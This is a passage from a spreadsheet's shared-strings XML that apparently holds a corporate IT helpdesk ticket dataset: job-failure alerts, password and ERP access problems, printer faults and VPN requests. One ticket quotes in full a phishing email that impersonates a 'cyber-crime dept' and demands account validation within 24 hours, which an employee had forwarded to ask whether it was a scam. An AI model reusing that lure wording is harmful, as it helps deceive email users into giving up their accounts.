    <t xml:space="preserve">job hr_payroll_na_u2 failed in job_scheduler at: 09/30/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u2 failed in job_scheduler at: 09/30/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2551 failed in job_scheduler at: 09/30/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2551 failed in job_scheduler at: 09/30/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u6 failed in job_scheduler at: 09/30/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u6 failed in job_scheduler at: 09/30/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_56filesys failed in job_scheduler at: 09/30/2016 22:24:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_56filesys failed in job_scheduler at: 09/30/2016 22:24:00</t>
  </si>
  <si>
    <t>i was on a skype call when programdnty locked up. after restarting computer several times i can not log into skype as it fre</t>
  </si>
  <si>
    <t>name:wpdxlbhz etvzjmhx
language:
browser:microsoft internet explorer
email:wpdxlbhz.etvzjmhx@gmail.com
customer number:
telephone:
summary:i was on a skype call when programdnty locked up. after restarting computer several times i can not log into skype as it freezes every time.
also can not get speaker on laptop (2 in 1 dell device)</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3186 failed in job_scheduler at: 09/30/2016 20:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3186 failed in job_scheduler at: 09/30/2016 20:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">laptop battery </t>
  </si>
  <si>
    <t>with full charge (indicates ~3hr 40 mint) but actual life ~ 2 hours.  seeking replacement (original battery, two years old)_x000D_
model:  e7240 (dell - asset number 404917)_x000D_
_x000D_
also rubber around screen is separating - can this be replaced/reattached - or should i super glue?</t>
  </si>
  <si>
    <t>kauozcir jlyqxise</t>
  </si>
  <si>
    <t>vpv - i get this message when i try to log on to erp using my vpn lately.  everything else works.</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bwfhtumx.japznrvb@gmail.com
[cid:image001.jpg@01SID_35b47.e1412191]
bwfhtumx japznrvb
 regional controller
bwfhtumx.japznrvb@gmail.com&lt;mailto:bwfhtumx.japznrvb@gmail.com&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">:i have a new laptop, and tried to log into </t>
  </si>
  <si>
    <t>name:danyhuie deyhtwet
language:
browser:microsoft internet explorer
email:rozsyfai.zncajubh@gmail.com
customer number:
telephone:
summary:i have a new laptop, and tried to log into 
enter the employee recognition site</t>
  </si>
  <si>
    <t>engineering_tool issue</t>
  </si>
  <si>
    <t>engineering_tool issue._x000D_
-connected to the user system using teamviewer._x000D_
-educated the user on how to use the engineering_tool._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>vnetbgio lqxztben</t>
  </si>
  <si>
    <t>unable to inwarehouse_tool</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nuhfwplj.ojcwxser@gmail.com_x000D_
_x000D_
i am unable to force the inwarehouse_tool on the below, also.  this too is consigned material and needs to inwarehouse_tool before the end of today._x000D_
please help._x000D_
_x000D_
[cid:image001.png@01SID_35b32.40369391]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>end of month billing</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: nuhfwplj.ojcwxser@gmail.com_x000D_
_x000D_
good afternoon,_x000D_
_x000D_
i am unable to force the billing for the below.  this is consigned material and needs to inwarehouse_tool before the end of today._x000D_
please help._x000D_
_x000D_
[cid:image001.png@01SID_35b31.6e02a420]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">password reset alert from o365 </t>
  </si>
  <si>
    <t>adgvefwp dwasygtb</t>
  </si>
  <si>
    <t>global erp crm:  any party change in complaint 7611184394 causes a blank screen upon saving, and the change is not saved</t>
  </si>
  <si>
    <t>global erp crm:  any party change in complaint 7611184394 causes a blank screen upon saving, and the change is not saved._x000D_
please investigate why this is happening and fix the problem.</t>
  </si>
  <si>
    <t>aoyrspjv hctgfeal</t>
  </si>
  <si>
    <t>ms crm dymanics : outlook client issue.</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:can you help me set up a crm tab in my outlook ribbon?</t>
  </si>
  <si>
    <t>ticket update on inplant_865520</t>
  </si>
  <si>
    <t>audio issue : windows audio issue ; 7350</t>
  </si>
  <si>
    <t>ticket update on inplant_865554</t>
  </si>
  <si>
    <t>insufficient permissions on web crm</t>
  </si>
  <si>
    <t>company distributor_tool is messed up. i enter through engineering_tool. it will not provide quote. error " no ship-to for account entered</t>
  </si>
  <si>
    <t>does not matheywter which account number i use. major inconvenience</t>
  </si>
  <si>
    <t>ms crm dynamics : outlook issue</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:i need to have the crm tab added to my computer</t>
  </si>
  <si>
    <t>upcgxthj lnsvemxy</t>
  </si>
  <si>
    <t>a solution is needed to find a permanent fix to be able to use memotech.</t>
  </si>
  <si>
    <t>a solution is needed to find a permanent fix to be able to use memotech._x000D_
_x000D_
add ken.mstipsolutions.com"  to compatibility list</t>
  </si>
  <si>
    <t>fyuqhlcx fjiuhxae</t>
  </si>
  <si>
    <t>reset the password for constance m wgtyillsford on erp / production / bw</t>
  </si>
  <si>
    <t>sydgvpao aocjqrmz</t>
  </si>
  <si>
    <t>euromote entry error</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: brhlcpqv.sfozwkyx@gmail.com_x000D_
_x000D_
hello,_x000D_
could you please help me on entering the euromote to open erp from my personel wireless._x000D_
_x000D_
[cid:image001.jpg@01SID_35b63.2c18a2d0]_x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>brhlcpqv sfozwkyx</t>
  </si>
  <si>
    <t>urgent</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: uezonywf.rldbvipu@gmail.com
after password change can't sign in to skype on dell 2 in 1. this has happened before and requires it to access my computer and delete files.
tommyth duyhurmont
channel partner sales engineer
company inc.
uezonywf.rldbvipu@gmail.com&lt;mailto:uezonywf.rldbvipu@gmail.com&gt;
www.company.com&lt;
[
</t>
  </si>
  <si>
    <t>uezonywf rldbvipu</t>
  </si>
  <si>
    <t>ticket update on inplant_865534</t>
  </si>
  <si>
    <t xml:space="preserve">vip 1 // finance_vip1 is unable to approve an expense report as its not showing in worklist </t>
  </si>
  <si>
    <t xml:space="preserve">from: lpoebzsc grknswyo 
sent: friday, september 30, 2016 11:32 pm
to: nwfodmhc exurcwkm
subject:  fw: expense report 8111118921 has been submitted.
good afternoon.  i tried entering an expense report for martha bank.  i sent it for finance_vip1' approval and it is not showing up in his worklist.  
i recently began supporting finance_vip1 and his team about a month ago.  perhaps something needs to be updated in the system for me to be able enter expense reports on their behalf?
in the past when i have had issues with ess, i contacted kyefsrjc eadmpzcn, however he is on vacation today.
your assistance in this matheywter is greatly appreciated.
</t>
  </si>
  <si>
    <t>back up tape still is not ejecting.</t>
  </si>
  <si>
    <t>back up tape not ejected today. unable to switch out tapes. previously switched them daily.</t>
  </si>
  <si>
    <t>rma #6001504109</t>
  </si>
  <si>
    <t>rma #7112615210_x000D_
_x000D_
workflow error rma needs to be processed before end of today</t>
  </si>
  <si>
    <t>asxmeruj drqufvgj</t>
  </si>
  <si>
    <t>unable to access engineering_tool</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vewdsifl.zjdmftkv@gmail.com_x000D_
_x000D_
dear sir,_x000D_
unable to access engineering_tool_x000D_
following error message shown_x000D_
[cid:image001.jpg@01SID_35b73.de8a24b0]_x000D_
request support to resolve_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>vitalyst // crm configuration in outlook</t>
  </si>
  <si>
    <t>unable to log in to windows to update password on password_management_tool</t>
  </si>
  <si>
    <t>ms crm dynamics issue</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:i have lost the crm ribbon in outlook.</t>
  </si>
  <si>
    <t>mfkvlxph bodikqcx</t>
  </si>
  <si>
    <t xml:space="preserve">job bwsdslspln failed in job_scheduler at: 09/30/2016 13:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bwsdslspln failed in job_scheduler at: 09/30/2016 13:15:00</t>
  </si>
  <si>
    <t>login issue_x000D_
-verified user details.(employee# &amp; manager name)_x000D_
-checked the user name in ad all fine_x000D_
-advised the user to login and check._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>:i am unable to "port.crm.dynamics.com"</t>
  </si>
  <si>
    <t>name:zdcheloy aevzsogn
language:
browser:microsoft internet explorer
email:zdcheloy.aevzsogn@gmail.com
customer number:
telephone:
summary:i am unable to "port.crm.dynamics.com"</t>
  </si>
  <si>
    <t>zdcheloy aevzsogn</t>
  </si>
  <si>
    <t>unable to login to distributor_tool as password expired</t>
  </si>
  <si>
    <t>company mobile device activation.</t>
  </si>
  <si>
    <t>company mobile device activation</t>
  </si>
  <si>
    <t xml:space="preserve">user "kehtxprg uekapfzt"  is not able to access erp SID_34 </t>
  </si>
  <si>
    <t xml:space="preserve">hi team, _x000D_
_x000D_
need your help!_x000D_
_x000D_
request you to check as  user "kehtxprg uekapfzt"  is not able to access erp SID_34 in turn which is blocking him to approve pr. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>kehtxprg uekapfzt</t>
  </si>
  <si>
    <t xml:space="preserve">audio driver issue </t>
  </si>
  <si>
    <t xml:space="preserve">
summary:hello,
my pc is formatheywted by local it but there is no sound.i think audio driver is not installed properly.could you help me ?</t>
  </si>
  <si>
    <t>jmoqelbc fbzsyjne</t>
  </si>
  <si>
    <t>SID_34 password reset</t>
  </si>
  <si>
    <t>name:mityhuch ervuyin
language:
browser:microsoft internet explorer
email:rlmbxeso.ulmkxdfi@gmail.com
customer number:
telephone:
summary:i cannot log into netweaver</t>
  </si>
  <si>
    <t>rlmbxeso ulmkxdfi</t>
  </si>
  <si>
    <t xml:space="preserve">engineering_tool access query </t>
  </si>
  <si>
    <t>hgizxmvq npzvagqy</t>
  </si>
  <si>
    <t>dba team - disk space for engg dba is full, can not create safety data sheets any more</t>
  </si>
  <si>
    <t xml:space="preserve">i figured out that i can not create any new sds any more. this is on the production system
the engg experts came back with the following issue:
hi ,
the drive where the engg prod db lives on is full. the dba's have to make it bigger. 
so, it's just a matheywter of having enough disk space.
can you let them know?
</t>
  </si>
  <si>
    <t>ooo until 5/oct/ : \\HostName_771\teams\materials</t>
  </si>
  <si>
    <t xml:space="preserve">ooo until 5/oct/_x000D_
_x000D_
received from: zxobmreq.udikorhv@gmail.com_x000D_
_x000D_
need access to \\HostName_771\teams\materials&lt;file:///\\HostName_771\teams\materials&gt;, on my computer system._x000D_
</t>
  </si>
  <si>
    <t>password and engineering tool</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: peojqgvm.qayeptuo@gmail.com_x000D_
_x000D_
i have let my password expire and need help getting back into our systems._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>peojqgvm qayeptuo</t>
  </si>
  <si>
    <t>please delete the transport SID_35k910404</t>
  </si>
  <si>
    <t>delete the transport from the buffer SID_35k910404</t>
  </si>
  <si>
    <t>abap report zsd_price_field_update update for rqfhiong zkwfqagb fields not working for me.</t>
  </si>
  <si>
    <t>please note that i am receiving an error message when trying to update rqfhiong zkwfqagb fields when using the zsd_price_field_update abap programdnty.  please see screenshots of error message.  i have also attached the uacyltoe hxgaycze file that i was uploading.  i am able to change the material pricing group through transaction mm02.  therefore, i don't think that it is a security problem.</t>
  </si>
  <si>
    <t xml:space="preserve">crm app </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: vybmcrxo.kirxdspz@gmail.com
hello,
trying to load the mobile crm app on iphone and while trying to run, putting in the "we're sorry your server is not available or does not support this application"
vybmcrxo kirxdspz
applications engineer
vybmcrxo.kirxdspz@gmail.com&lt;mailto:vybmcrxo.kirxdspz@gmail.com&gt;
</t>
  </si>
  <si>
    <t>vybmcrxo kirxdspz</t>
  </si>
  <si>
    <t>cannot access \\HostName_779\engineering_application from vpn.company using vvblothryor - inc1553079 closed not fixed</t>
  </si>
  <si>
    <t>cannot access \\HostName_779\engineering_application from vpn.company using vvbloor - inc1553079 closed not fixed. please do not assign to vidya. computer lbdl8513228 can access the \\HostName_779\engineering_application using other sign-ons. dudekm signed onto the computer and it works. vvbloor can sign-on to the computer and use dudekm to sign-on to the vpn and it works. it does not work when vvbloor signs-on to the vpn. vvblorytor can access other servers HostName_776, HostName_768. just cannot access HostName_779.</t>
  </si>
  <si>
    <t>travel_tool</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zdcheloy.aevzsogn@gmail.com
my manager was changed to mhtyike szumyhtulas in july but my travel is still going to my previous manager qvhixotw rxutkyha.  i tried to change in travel_tool but it is greyed out.  can this be changed to correct manager?
zdcheloy aevzsogn
manager, business operational excellence
zdcheloy.aevzsogn@gmail.com&lt;mailto:zdcheloy.aevzsogn@gmail.com&gt;
</t>
  </si>
  <si>
    <t>help with files engineering_tool - error</t>
  </si>
  <si>
    <t xml:space="preserve">hi team, _x000D_
_x000D_
could you please, help user urgapyzt tnxiuramdnty to open files the engineering_tool (engineering_tool)._x000D_
_x000D_
he did downloaded the file in site _x000D_
"error the verification (name_file).ktr. the file is with error". _x000D_
_x000D_
this message appears to all files the site. in attachment i'm including the screen with error and the file .zip._x000D_
_x000D_
let me know if you have more doubts, you can contact with user. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>urgapyzt tnxiuram</t>
  </si>
  <si>
    <t>windows account locked out.</t>
  </si>
  <si>
    <t>kifmqeph srlzgbhw</t>
  </si>
  <si>
    <t xml:space="preserve">logon balancing error in erp </t>
  </si>
  <si>
    <t>umkpayhc adflvbxg</t>
  </si>
  <si>
    <t>login to citrix tro access erp ; vvparthyrra : password change request from manager</t>
  </si>
  <si>
    <t>laptop not booting up</t>
  </si>
  <si>
    <t>qksrtvzb vjkftuai said that he spilled some coffee on his laptop yesterday and since then the machine is not booting up and he wants to get this checked and replaced if necessary.</t>
  </si>
  <si>
    <t>qksrtvzb vjkftuai</t>
  </si>
  <si>
    <t xml:space="preserve">please create an rma# for the nov-tx return.  </t>
  </si>
  <si>
    <t>please see attachments.</t>
  </si>
  <si>
    <t>iytebhvd coerxklt</t>
  </si>
  <si>
    <t>extend the account - vvnewthey - urgent</t>
  </si>
  <si>
    <t>account has expired on september 29th_x000D_
need to extend the account until the end of the year._x000D_
_x000D_
need this done as soon as possible, as the employee is assisting with tasks that are related to an employee who is leaving the company today._x000D_
please expedite.</t>
  </si>
  <si>
    <t>ms crm dymanics : giving error message while loading outlook</t>
  </si>
  <si>
    <t>hvgdafke mnowgefz</t>
  </si>
  <si>
    <t>need an update on inplant_865235</t>
  </si>
  <si>
    <t xml:space="preserve">synchronization log mails after accepting calendar invite </t>
  </si>
  <si>
    <t>hduzwpio wrcgunso</t>
  </si>
  <si>
    <t xml:space="preserve">infopath installation </t>
  </si>
  <si>
    <t xml:space="preserve">phishing emails uacyltoe hxgaycze query </t>
  </si>
  <si>
    <t>[usa] order not moving to to-do list 5 hours after confirmations</t>
  </si>
  <si>
    <t>please see attached ppt, op 20 is confirmed but order is not showing up in op 25's to-do list even after 5 hours. (both ops are in same work center)_x000D_
my understanding is that the background job runs every 15 minutes</t>
  </si>
  <si>
    <t>printer driver not loading properly</t>
  </si>
  <si>
    <t>usa bd05 printer says it needs drivers updated, but continually fails to update or allow printing.</t>
  </si>
  <si>
    <t>engineering tool</t>
  </si>
  <si>
    <t xml:space="preserve">i am experiencing a reoccurring issue with my erp/engineering tool. i am not able to display original files (pdf's and stp's). this is a major function in my role and unable to complete any work unless it is resolved. this issue occurs every time an upgrade occurs to erp or engineering tool._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>tfyhebmk elywjuvm</t>
  </si>
  <si>
    <t>spam email</t>
  </si>
  <si>
    <t xml:space="preserve">from: vkzwafuh tcjnuswg 
sent: friday, september 30, 2016 6:20 pm
to: nwfodmhc exurcwkm
subject: amar fw: you must validate your account
hi,
is this a legitimate email or a scam? 
vkzwafuh tcjnuswg - cmp
sr. application eng.
vkzwafuh.tcjnuswg@gmail.com
from: cyber-crime dept [mailto:cybercrime@secure.safe-browsing.com] 
sent: friday, september 30, 2016 3:33 am
to: vkzwafuh tcjnuswg &lt;vkzwafuh.tcjnuswg@gmail.com&gt;
subject: you must validate your account
dear mail user,
as part of the security measures to secure all email users across the world, all email users are mandated to have their account details registered as requested by the cyber-crime dept.
you are here by required to validate your account within 24 hours so as not to have your email account suspended and deleted from the world email server.
kindly validate your email account to have your account registered, please click here.
</t>
  </si>
  <si>
    <t>need tc48 printer set up</t>
  </si>
  <si>
    <t xml:space="preserve">i am trying to connect to network printer tc48 located in the tech. center. my computer is having issues finding the correct driver to link to the printer. please assist, </t>
  </si>
  <si>
    <t>outlook calendar invite issue</t>
  </si>
  <si>
    <t xml:space="preserve">outloook calendar invites are automatically creating multiple meeting requests when a single meeting entry is sent.  causing issues for customers internal and external by filling inboxes with multiple invites for same meeting and resending invite every day up to the meeting and causing confusion.  please advise help aerp.  </t>
  </si>
  <si>
    <t>urgqkinl zpcokgbj</t>
  </si>
  <si>
    <t>computer in tool and cutter is down</t>
  </si>
  <si>
    <t>ovxrzwac clhxuzgy</t>
  </si>
  <si>
    <t>anmelden bei outlook nicht mÃ¶glich</t>
  </si>
  <si>
    <t xml:space="preserve">anmelden bei outlook seit passwort Ã¤ndern nicht mÃ¶glich
tel: </t>
  </si>
  <si>
    <t>cobdhkmj bikjecaz</t>
  </si>
  <si>
    <t>adding shared mailbox to outlook</t>
  </si>
  <si>
    <t>workcenter description showing user ids</t>
  </si>
  <si>
    <t>issue reported from us_plant. please see attached picture</t>
  </si>
  <si>
    <t>company center- passwords do not work---- need fixed aerp</t>
  </si>
  <si>
    <t xml:space="preserve">hi, i created accounts in company center and they aren't working.  can someone please call me as soon as possible?  it would be great if the person who contacts me has access to active directory because i think this may be the problem.  </t>
  </si>
  <si>
    <t>djkipmqo hjzeuwrd</t>
  </si>
  <si>
    <t>engineering tool install request</t>
  </si>
  <si>
    <t>non company pc - windows 8.1 operating system - surthryr stahyru</t>
  </si>
  <si>
    <t xml:space="preserve">unable to load outlook </t>
  </si>
  <si>
    <t>need to retrieve deleted emails</t>
  </si>
  <si>
    <t>bujghvne cnpdhfmi</t>
  </si>
  <si>
    <t xml:space="preserve">z_chk issue del# 9169472003 </t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
_x000D_
we are facing an issue of the below screen shot. please help us how to resolve this issue. we are very urgent to complete this stragiht away._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>iwazgesl ydgqtpbo</t>
  </si>
  <si>
    <t xml:space="preserve">remote SID_1 connection open for oss 344427 / 2016 </t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_1_x000D_
_x000D_
enter user id of user having the issue: vv344427 and please copy the same roles of kawtidthry._x000D_
_x000D_
transaction code(s) the user needs or was working with: va23 _x000D_
_x000D_
describe the issue: please open the SID_1 connection to erp and provide remote login data to erp._x000D_
_x000D_
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000D_
_x000D_
provide access the same as this other user:</t>
  </si>
  <si>
    <t>arhjlgdz pxtsjnlk</t>
  </si>
  <si>
    <t xml:space="preserve">india:high latency/packet drops:telecom_vendor_1 sr:25128965 &amp; 25132562 </t>
  </si>
  <si>
    <t>india:high latency/packet drops</t>
  </si>
  <si>
    <t>hello  please urgently fix!  mwstã€€errorã€‚ã€‚ã€‚  mm7218674  best regards.</t>
  </si>
  <si>
    <t xml:space="preserve">hello_x000D_
_x000D_
please urgently fix!_x000D_
_x000D_
mwstã€€errorã€‚ã€‚ã€‚_x000D_
_x000D_
mm7218674_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>uxndyfrs vahxnfgl</t>
  </si>
  <si>
    <t>probleme mit drucken \vermessungsmaschine fÃ¼r stÃ¤be \eaodcgsw trmzwbyc</t>
  </si>
  <si>
    <t>support fÃ¼r alicona \jionmpsf wnkpzcmv</t>
  </si>
  <si>
    <t>error when qualifying lead by user prarthyr jhr</t>
  </si>
  <si>
    <t>refer email sent</t>
  </si>
  <si>
    <t>restart the company service in HostName_1041</t>
  </si>
  <si>
    <t>fw: you must validate your account</t>
  </si>
  <si>
    <t xml:space="preserve">dear it help,_x000D_
_x000D_
i got below email, what should i do? is it corporate instruction or external party which no need to follow. _x000D_
_x000D_
please advice._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>uvjpaeli bnphqsxr</t>
  </si>
  <si>
    <t>german call</t>
  </si>
  <si>
    <t>need addiitional software and email settings checked.</t>
  </si>
  <si>
    <t xml:space="preserve">from: wykigmnz wvdgopybrumugam 
sent: 06 september 2016 17:21
to: mgyhnsat aswubnyd
cc: sridthshar herytur; mvfnbces urbckxna1; dargthya jayartheuy; amihtar lalthy; tcqpyuei becoxvqkahadikar; jayatramdntydba cvyg
subject: re: old laptop e-6410 or e- 6420
dear mr.,
i am started using the new laptop &amp; the following issue facing.
s no requirement / problem remarkhtys
1 csm module not working properly 
2 wrench_engineering_toolent software not available 
3 fanuc ladder  software not available 
4 in mail, some option not working properly 
5 dwg true viewer software required 
please do the needful.
best </t>
  </si>
  <si>
    <t>wykigmnz wvdgopyb</t>
  </si>
  <si>
    <t>log on balancing error.</t>
  </si>
  <si>
    <t>ticket update inplant_862430</t>
  </si>
  <si>
    <t>engineering tool not working</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ftsqkvre.bqzrupic@gmail.com_x000D_
_x000D_
dear sir_x000D_
_x000D_
ivohcdpw ixcanwbm is not able to access his engineering tool. he has requested for help also from it but till date nothing has moved ahead. please help nthryitin to get access to engineering tool and install the same at earliest._x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>drucker em26 druckt mit bis zu 2 std. verzÃ¶gerung (printer can not be pinged. see attachment)</t>
  </si>
  <si>
    <t>drucker em26 druckt mit bis zu 2 std. verzÃ¶gerung _x000D_
wird von pc eemw8144218 aus gedruckt ce ap messecke_x000D_
_x000D_
â€¢  printer name / make - model?  (ex hq50 â€“ wy98 - hp 8150) : em26_x000D_
â€¢  detailed description of the problem ? : printer takes too long time to print. error :' 49.ff04 error. turn off then on' . the printer is restarted a couple of times. does not help. printer can not be pinged. (see attachment) it looks like it's a non existing printer._x000D_
_x000D_
â€¢  type of documents not printing?  (email â€“ excel â€“ wordâ€¦etc) : data from access datenbank, excel_x000D_
      (inwarehouse_tool â€“ delivery note â€“ production orderâ€¦etc)_x000D_
â€¢  what system or application being used at time of the problem?      (ex windows / erp /kls) : windows</t>
  </si>
  <si>
    <t>djilqgmw bidchqsg</t>
  </si>
  <si>
    <t>info type '0017' is missing to personal numbers 5264454, 5634451 &amp; 5659454</t>
  </si>
  <si>
    <t xml:space="preserve">from: lmwohkbd ucziatex 
sent: friday, september 30, 2016 11:42 am
to: nyifqpmv kfirxjag
subject: aw: travel expense manager
hello
transaktion â€žpr05" also doesn't work for personal no's 56595674 and 5634561.
mit freundlichen grÃ¼ÃŸen 
lmwohkbd ucziatex
programdnty engineering europe
lmwohkbd.ucziatex@gmail.com
geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx, naruedlk mpvhakdq
von: lmwohkbd ucziatex 
gesendet: freitag, 30. september 2016 08:03
an: nyifqpmv kfirxjag &lt;nmtszgbr.wnthvqgm@gmail.com&gt;
betreff: travel expense manager
hello 
â€žtravel expense manager" doesn't work!
mit freundlichen grÃ¼ÃŸen 
lmwohkbd ucziatex
programdnty engineering europe
lmwohkbd.ucziatex@gmail.com
</t>
  </si>
  <si>
    <t>lmwohkbd ucziatex</t>
  </si>
  <si>
    <t>vpn access for elcpduzg eujpstxi (graurkart)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fbyusmxz.kxvmcbly@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
please set up vpn access for elcpduzg eujpstxi (graurkart)._x000D_
rudolf has a kennmetal owned laptop eeml703222_x000D_
</t>
  </si>
  <si>
    <t>outlook was not accepting password</t>
  </si>
  <si>
    <t>user change the password through vpn._x000D_
user was getting a password prompt.</t>
  </si>
  <si>
    <t>nmtszgbr wnthvqgm</t>
  </si>
  <si>
    <t>script jb_ecc_bw_zsd531 to pull august 2016 month data and revert back to delta extraction.</t>
  </si>
  <si>
    <t>we are in the process of refreshing history in rr. we need to modify bobj script jb_ecc_bw_zsd531 to pull august 2016 month new pricing sales data from zsd532 by giving date range. we need to move the changes to production and extract the data today itself. once the data is extracted, we will revert back the programdnty jb_ecc_bw_zsd531 to extract delta data.</t>
  </si>
  <si>
    <t>ualdxfir kizjmqte</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 09/30/2016 04:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 09/30/2016 04:36:00</t>
  </si>
  <si>
    <t>probleme mit skype und outlook \ user :dardabthyr</t>
  </si>
  <si>
    <t>probleme mit skype und outlook \dardabthyr</t>
  </si>
  <si>
    <t>kannst du bitte noch mal 2 usb-sticks   16 gb besorgen  bei uns ist wieder einer kaputt gegangen</t>
  </si>
  <si>
    <t>unser kopierer we 95 (hp laserjet) zeigt fehlermeldung â€žtransfereinheit fehlt" an.</t>
  </si>
  <si>
    <t xml:space="preserve">erp access issue :  refrence to oss 337622 / 2016 </t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_1
enter user id of user having the issue: vv337622
transaction code(s) the user needs or was working with: va01 &amp; please copy the roles of user id kawtidthry.
describe the issue: please provide remote login credentials and update in oss secure connection area.
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket.
provide access the same as this other user:</t>
  </si>
  <si>
    <t>ir posting error_urgently</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: tkjypfze.jxompytk@gmail.com_x000D_
_x000D_
hi team,_x000D_
_x000D_
kindly create a ticket and assign it to me_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">enterprise scanner is freezing. </t>
  </si>
  <si>
    <t>enterprise scanner is freezing. 
telephone:</t>
  </si>
  <si>
    <t>vrmdtcal agythfow</t>
  </si>
  <si>
    <t xml:space="preserve">job bk_biaprod failed in job_scheduler at: 09/30/2016 03:47:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
[major] from: bma@HostName_1304.hq.company.com "lib6_drive4"  time: 9/30/2016 3:45:46 am_x000D_
[90:51]   /dev/rmt35.1_x000D_
 cannot write to device ([5] i/o error)_x000D_
_x000D_
job bk_biaprod failed in job_scheduler at: 09/30/2016 03:47:00</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ihfkwzjd.erbxoyqk@gmail.com_x000D_
_x000D_
dear it team_x000D_
_x000D_
kindly fixed it transaction error as below within 30/9/19 to avoid difference for intercompany reconciliation._x000D_
_x000D_
_x000D_
1.     ir transaction has not been posted._x000D_
[cid:image003.jpg@01SID_35b29.6f9d3af0]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
2.     duplicate ir transaction._x000D_
[cid:image006.jpg@01SID_35b29.6f9d3af0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>vpnå®‰è£…-è½¬è´ºæ­£å¹³</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: tuqrvowp.fxmzkvqo@gmail.com
è¯·å¸®å¿™å®‰è£…vpnè½¯ä»¶ï¼Œ è½¬è´ºæ­£å¹³
tuqrvowp fxmzkvqo é’±å”é‘«
human resources
tuqrvowp.fxmzkvqo@gmail.com&lt;mailto:tuqrvowp.fxmzkvqo@gmail.com&gt;
ä¸Šæµ·å‡é˜³è¶…å¾®ç²‰æœ‰é™å…¬å¸
ä¸Šæµ·å¸‚å¥‰è´¤åŒºé™ˆæ¡¥è·¯1508å·
é‚®ç¼–ï¼š201400
</t>
  </si>
  <si>
    <t>tuqrvowp fxmzkvqo</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2645 failed in job_scheduler at: 09/30/2016 03:35:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2645 failed in job_scheduler at: 09/30/2016 03:35:00</t>
  </si>
  <si>
    <t>please approve primary email of jeknosml gkcoltsy in ms crm</t>
  </si>
  <si>
    <t xml:space="preserve">hello_x000D_
please approve primary email of jeknosml gkcoltsy in ms crm prod and train. email: jeknosml.gkcoltsy@gmail.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>"po not created"</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vhlepcta.lqbgcxpt@gmail.com_x000D_
_x000D_
hello team,_x000D_
could you please check the error and help us? we cannot create the inwarehouse_tool for this delivery for 3 months because of this error and it cannot be solved._x000D_
_x000D_
your urgent support is needed._x000D_
</t>
  </si>
  <si>
    <t>vhlepcta lqbgcxpt</t>
  </si>
  <si>
    <t>erp is very slow, please resolve the issue on urgent basis.</t>
  </si>
  <si>
